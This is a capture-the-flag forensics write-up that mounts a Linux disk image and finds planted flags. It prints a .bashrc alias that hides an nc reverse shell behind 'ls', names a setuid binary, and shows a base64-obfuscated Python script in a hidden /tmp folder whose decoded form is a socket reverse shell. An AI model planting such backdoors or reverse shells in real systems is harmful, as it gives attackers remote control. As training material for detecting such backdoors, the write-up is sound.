Bad Fish
Stage 001
BRIEFING
Difficulty: Introductory
Uh Oh it seems a few bad fish got into the fish tank!
Can you find them all?
Challenge File: badfish.zip
Zip Password: bAdFi5h
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 1_This_Is_a_Fake_Flag
Work/Solution
Find the offset of the partition.
fdisk -l ./badfish.img
Disk ./badfish.img: 1 GiB, 1073741824 bytes, 2097152 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xae84473a
Device         Boot Start     End Sectors  Size Id Type
./badfish.img1 *     2048 2097151 2095104 1023M 83 Linux
The sector size is 512 bytes and the partition starts at sector 2048, so the byte offset is 512 * 2048 = 1048576.
mount -o loop,offset=1048576 badfish.img /mnt/tmp
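The same offset can be read straight from the partition table in sector 0 instead of from fdisk. The following is an added example, not part of the original write-up: the sample MBR is constructed from the fdisk values above, the function names are this example's own, and the `ro` and `sizelimit` mount options are additions to the command shown on the page.

```python
import struct

SECTOR_SIZE = 512  # logical sector size reported by fdisk above


def build_sample_mbr():
    """Constructed sector 0 that mirrors the fdisk output above (CHS fields zeroed)."""
    mbr = bytearray(SECTOR_SIZE)
    struct.pack_into("<I", mbr, 440, 0xAE84473A)  # disk identifier
    # 16-byte entry: status, CHS start, type, CHS end, start LBA, sector count
    struct.pack_into("<B3sB3sII", mbr, 446, 0x80, b"\0" * 3, 0x83, b"\0" * 3, 2048, 2095104)
    mbr[510:512] = b"\x55\xaa"  # boot signature
    return bytes(mbr)


def parse_mbr(sector0, sector_size=SECTOR_SIZE):
    """Return the non-empty primary partitions with byte offset and length."""
    if len(sector0) < 512 or sector0[510:512] != b"\x55\xaa":
        raise ValueError("missing 0x55AA boot signature: not a DOS/MBR disklabel")
    partitions = []
    for slot in range(4):
        status, _, ptype, _, start, count = struct.unpack_from("<B3sB3sII", sector0, 446 + 16 * slot)
        if ptype == 0x00 or count == 0:
            continue  # unused slot
        partitions.append({
            "slot": slot + 1, "bootable": status == 0x80, "type": ptype,
            "start_sector": start, "sectors": count,
            "offset": start * sector_size, "sizelimit": count * sector_size,
        })
    return partitions


def mount_command(image, part, mountpoint="/mnt/tmp"):
    """Read-only loop mount bounded to the partition's own byte range."""
    opts = f"ro,loop,offset={part['offset']},sizelimit={part['sizelimit']}"
    return f"mount -o {opts} {image} {mountpoint}"


if __name__ == "__main__":
    # For a real image, pass open(path, "rb").read(512) instead of the sample.
    for part in parse_mbr(build_sample_mbr()):
        print(part)
        print(mount_command("badfish.img", part))
```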
Ok, this is a Linux disk image.
la /mnt/tmp
total 76K
lrwxrwxrwx 1 root root 7 Oct 3 2022 bin -> usr/bin
drwxr-xr-x 2 root root 4.0K Oct 23 2022 boot
drwxr-xr-x 4 root root 4.0K Oct 23 2022 dev
drwxr-xr-x 47 root root 4.0K Oct 23 2022 etc
drwxr-xr-x 3 root root 4.0K Oct 23 2022 home
lrwxrwxrwx 1 root root 30 Oct 22 2022 initrd.img -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx 1 root root 30 Oct 22 2022 initrd.img.old -> boot/initrd.img-5.19.0-2-amd64
lrwxrwxrwx 1 root root 7 Oct 3 2022 lib -> usr/lib
lrwxrwxrwx 1 root root 9 Oct 3 2022 lib32 -> usr/lib32
lrwxrwxrwx 1 root root 9 Oct 3 2022 lib64 -> usr/lib64
lrwxrwxrwx 1 root root 10 Oct 3 2022 libx32 -> usr/libx32
drwx------ 2 root root 16K Oct 23 2022 lost+found
drwxr-xr-x 2 root root 4.0K Oct 3 2022 media
drwxr-xr-x 2 root root 4.0K Oct 3 2022 mnt
drwxr-xr-x 2 root root 4.0K Oct 3 2022 opt
drwxr-xr-x 2 root root 4.0K Jan 19 2022 proc
drwx------ 2 root root 4.0K Oct 3 2022 root
drwxr-xr-x 8 root root 4.0K Oct 22 2022 run
lrwxrwxrwx 1 root root 8 Oct 3 2022 sbin -> usr/sbin
drwxr-xr-x 2 root root 4.0K Oct 3 2022 srv
drwxr-xr-x 2 root root 4.0K Jan 19 2022 sys
drwxrwxrwt 3 root root 4.0K Oct 23 2022 tmp
drwxr-xr-x 14 root root 4.0K Oct 3 2022 usr
drwxr-xr-x 11 root root 4.0K Oct 3 2022 var
lrwxrwxrwx 1 root root 27 Oct 22 2022 vmlinuz -> boot/vmlinuz-5.19.0-2-amd64
lrwxrwxrwx 1 root root 27 Oct 22 2022 vmlinuz.old -> boot/vmlinuz-5.19.0-2-amd64
Found this flag in etc/apt/sources.list.
grep -r "1_" /mnt/tmp/etc
/mnt/tmp/etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt: # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/conf.d/acl/30_exim4-config_check_rcpt: # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/conf.d/rewrite/31_exim4-config_rewriting:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template:# /etc/exim4/conf.d/main/01_exim4-config_listmacrosdefs is only used
/mnt/tmp/etc/exim4/exim4.conf.template:### end main/01_exim4-config_listmacrosdefs
/mnt/tmp/etc/exim4/exim4.conf.template: # defined in main/01_exim4-config_listmacrosdefs or override them from a
/mnt/tmp/etc/exim4/exim4.conf.template: # main/01_exim4-config_listmacrosdefs:
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### rewrite/31_exim4-config_rewriting
/mnt/tmp/etc/exim4/exim4.conf.template:### end rewrite/31_exim4-config_rewriting
grep: /mnt/tmp/etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg: binary file matches
/mnt/tmp/etc/apt/sources.list:deb 'http://1_5w1m_uP_dA_r3P0/ stretch main contrib non-free
/mnt/tmp/etc/ca-certificates.conf:mozilla/QuoVadis_Root_CA_1_G3.crt
Stage 002
BRIEFING
Difficulty: Introductory
Felines really do love fish.
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 2_This_Is_a_Fake_Flag
Work/Solution
This was the second flag I discovered. While exploring the mounted file system, I looked at the .bashrc file in /home/nemo, where I discovered the flag in an alias.
la home
total 4.0K
drwxr-xr-x 2 8877 8877 4.0K Oct 23 2022 nemo
la home/nemo
total 12K
-rw-r--r-- 1 8877 8877 220 Aug 25 2022 .bash_logout
-rw-r--r-- 1 8877 8877 3.5K Oct 23 2022 .bashrc
-rw-r--r-- 1 8877 8877 807 Aug 25 2022 .profile
tail -n5 home/nemo/.bashrc
elif [ -f /etc/bash_completion ]; then
. /etc/bash_completion
fi
fi
alias ls='ls;nc 2_sM31ly_CaT 4454 -e /bin/bash'
Stage 003
BRIEFING
Difficulty: Introductory
Are you concerned how pollution is impacting our oceans?
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 3_This_Is_a_Fake_Flag
Work/Solution
I found this flag while exploring the mounted file system as well. It was in plain sight.
la bin/ | head -n 5
total 45M
-rwsr-xr-x 1 root root 31K Oct 22 2022 3_5tr1nGs_r_BaD_4_f15H
lrwxrwxrwx 1 root root 22 Apr 14 2022 Mail -> /etc/alternatives/Mail
-rwxr-xr-x 1 root root 67K Sep 20 2022 [
-rwxr-xr-x 1 root root 31K Oct 16 2022 addpart
Stage 004
BRIEFING
Difficulty: Easy
SSShhhhhhh! Don't tell anyone I got here.
DISCLAIMER: Flag will start with the number of the challenge it belongs to.
EXAMPLE: 4_This_Is_a_Fake_Flag
Work/Solution
I found this flag while attempting to solve Stage 001. After I mounted the .img file as described in Stage 001, I started poking around the file system. The first place I looked was in /tmp, where I discovered a Python file.
cd /mnt/tmp
la tmp
total 4.0K
drwxr-xr-x 2 root root 4.0K Oct 23 2022 .d
la tmp/.d
total 4.0K
-rwxr-xr-x 1 root root 611 Oct 23 2022 daily.py
The contents of daily.py:
import base64
test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)
I added a print(test) statement to the end of the file:
import base64
test = ""
for i in ['YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=', 'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=', 'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=', 'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=', 'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp']:
    test = test + base64.b64decode(i).decode()
eval(test)
print(test)
Running the Python file:
python tmp/.d/daily.py
base64.b64decode('CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=')
Decoding the output string:
echo 'CmZyb20gb3MgaW1wb3J0IGR1cDIKZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBydW4KaW1wb3J0IHNvY2tldApzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQsc29ja2V0LlNPQ0tfU1RSRUFNKQpzLmNvbm5lY3QoKCI0XzVuM2FreV81bkVha1kiLDg4ODgpKQpkdXAyKHMuZmlsZW5vKCksMCkKZHVwMihzLmZpbGVubygpLDEpCmR1cDIocy5maWxlbm8oKSwyKQpydW4oWyIvYmluL2Jhc2giLCItaSJdKQo=' | base64 -d
from os import dup2
from subprocess import run
import socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("4_5n3aky_5nEakY",8888))
dup2(s.fileno(),0)
dup2(s.fileno(),1)
dup2(s.fileno(),2)
run(["/bin/bash","-i"])
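Both layers of daily.py can also be decoded without running the file or calling eval(), by parsing each layer with Python's ast module and reading the connection target from the syntax tree. This is an added example, not part of the original write-up: the chunk list is copied from daily.py as shown above, and the function names are this example's own.

```python
import ast
import base64

# First-layer chunk list, copied from daily.py as shown above.
CHUNKS = [
    'YmFzZTY0LmI2NGRlY29kZSgnQ21aeWI=', 'MjBnYjNNZ2FXMXdiM0owSUdSMWNESUs=', 'Wm5KdmJTQnpkV0p3Y205alpYTnpJR2w=',
    'dGNHOXlkQ0J5ZFc0S2FXMXdiM0owSUg=', 'TnZZMnRsZEFwelBYTnZZMnRsZEM1emI=', 'Mk5yWlhRb2MyOWphMlYwTGtGR1gwbE8=',
    'UlZRc2MyOWphMlYwTGxOUFEwdGZVMVI=', 'U1JVRk5LUXB6TG1OdmJtNWxZM1FvS0M=', 'STBYelZ1TTJGcmVWODFia1ZoYTFraUw=',
    'RGc0T0RncEtRcGtkWEF5S0hNdVptbHM=', 'Wlc1dktDa3NNQ2tLWkhWd01paHpMbVo=', 'cGJHVnVieWdwTERFcENtUjFjRElvY3k=',
    'NW1hV3hsYm04b0tTd3lLUXB5ZFc0b1c=', 'eUl2WW1sdUwySmhjMmdpTENJdGFTSmQ=', 'S1FvPScp',
]

def is_call_to(node, attr):
    """True if node is a call of the form <something>.<attr>(arg, ...)."""
    return (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
            and node.func.attr == attr and len(node.args) >= 1)

def peel(text, max_layers=8):
    """Unwrap nested base64.b64decode('<literal>') expressions by parsing, never eval()."""
    layers = [text]
    for _ in range(max_layers):
        try:
            node = ast.parse(layers[-1].strip(), mode="eval").body
            if not is_call_to(node, "b64decode"):
                break
            blob = ast.literal_eval(node.args[0])
            layers.append(base64.b64decode(blob).decode("utf-8", "replace"))
        except (SyntaxError, ValueError, TypeError):
            break  # not a single decodable expression: this layer is the payload
    return layers

def connect_targets(source):
    """Literal (host, port) tuples passed to any .connect() call, read from the AST."""
    targets = []
    for node in ast.walk(ast.parse(source)):
        if is_call_to(node, "connect") and isinstance(node.args[0], ast.Tuple):
            try:
                targets.append(ast.literal_eval(node.args[0]))
            except ValueError:
                pass  # tuple built from variables; nothing static to report
    return targets

def analyse(chunks=CHUNKS):
    layers = peel("".join(base64.b64decode(c).decode() for c in chunks))
    return layers, connect_targets(layers[-1])

if __name__ == "__main__":
    layers, targets = analyse()
    print(layers[-1], "\nconnect targets:", targets)
```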